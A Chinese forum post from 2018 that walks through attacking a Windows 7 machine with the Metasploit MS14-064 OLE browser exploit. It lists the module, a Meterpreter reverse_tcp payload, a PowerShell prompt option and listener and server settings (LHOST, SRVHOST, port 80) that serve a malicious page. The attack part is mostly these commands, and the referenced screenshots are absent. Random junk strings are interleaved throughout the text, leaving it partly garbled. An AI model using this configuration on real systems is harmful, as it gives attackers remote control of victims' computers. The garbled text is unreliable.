找回密码
 立即注册
查看: 2392|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; D1 v6 x" ^$ q. ^0 j3 A9 O; z 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 5 b7 f2 `0 ?$ e3 L

0 W5 W' `9 j: z/ s6 s! b$ l

& v! t0 d( k5 m) A 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: + C; f# C+ H! d

b4 Y/ N9 b# F; z! E. ~8 [

], c7 G l+ d) w! I, \ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp/ p7 h. t1 T. y3 R' k

# p) _7 m9 ?& U# Q

0 \9 X+ C' _# g* f! @! x             set AllowPowershellPrompt true 6 J* V G$ q" s! |, ^5 V7 E, M/ j

+ B9 Z. S/ Q3 a7 b% }' L! Z: s

7 K# J, [6 S4 c+ `             Set LHOST 192.168.0.109: u! {* a& } ^: |5 m

8 b# Z9 Y: Z2 H% A

; I; X& {0 ~8 o+ w, O             set SRVHOST 192.168.0.109 ' f# v+ k) k2 t0 q) E- V

+ P- ? k, ~2 b; n% R1 z

( f# N% P5 e: H6 |6 f* \! ^+ b             Set uripath share , n1 m' T9 y& t5 Y) k0 S

2 ~; o. c8 C" [, w) ^) I6 |$ E

e; x/ J- {& m7 W             Set srvport 80- B0 j: j, V: v# }

. R# h0 [- y2 ?3 L( o0 k

# j& D M$ Q. ^   9 h% }) H' z) I+ l( G% t- F

+ n P% X9 n& f0 g6 @

/ K& v) b& E. N2 }6 W   / k$ D% @5 q+ Q; C# ? U

7 R* k! ^8 R ?1 m/ ]9 Y9 T

4 y( V; w2 ?* @0 z! c3 m. n0 i+ |" R  * Z: r$ u: Y. o" Y

! S; I# M, T$ |9 c, b) R$ v8 x' }

+ ?. D! ?; V, `4 G   0 l9 r- ^, Z+ g* Q; W4 t

! }! t+ e3 {% ]' }; Y

) o! j7 g: }" K: e2 y+ J6 O  % G7 m' C6 Q3 M( g: |

0 s% @! K/ i" t- f2 L6 ?

0 B2 W: d6 E* C 下面我们来访问本地地址如图: - k8 O' L p) k7 M5 a

: F) k5 c" O% ]. T/ p

. j1 o0 h7 [6 F   ; Z% U6 z; e0 E( l, m

6 ?1 c$ S0 j) j) |6 \# A

3 R+ ^( f) N7 j  8 M4 c6 z) K$ x; r6 ?, T& A2 V

. q l6 t3 }; n- S

6 U2 s+ G* F3 v3 W2 m! C" M1 r 0 r: H' D! \- K7 N; z5 |5 m+ D6 ?

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表